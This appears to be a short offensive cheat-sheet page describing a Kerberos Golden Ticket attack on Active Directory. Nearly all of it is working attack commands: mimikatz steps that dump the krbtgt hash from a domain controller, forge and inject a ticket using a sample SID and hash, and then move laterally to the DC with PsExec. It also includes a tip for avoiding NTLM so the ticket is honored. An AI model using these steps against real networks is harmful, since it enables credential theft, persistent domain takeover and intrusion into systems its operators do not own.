>_ shadow.red

Golden Ticket

Active Directory AD Attacks windows

Forge a TGT using the krbtgt password hash for full domain persistence.

Step 1 - Dump krbtgt hash on the DC (needs Domain Admin)

mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch

Look for the krbtgt line and the NTLM value.

Step 2 - Purge existing tickets

mimikatz # kerberos::purge

Step 3 - Forge the golden ticket

mimikatz # kerberos::golden /user:maria /domain:intranet.local /sid:S-1-5-21-3842570612-715204487-3928531750 /krbtgt:4e82f4d28e35a85c7a4daa9158f4b8c1 /ptt
mimikatz # misc::cmd

Parameters:

Step 4 - Lateral movement to the DC

Use the new cmd from misc::cmd:

PsExec.exe \\dc02 cmd.exe
whoami
whoami /groups

Important: connect by hostname (\\dc02), not IP - IP forces NTLM and the ticket won’t be honored.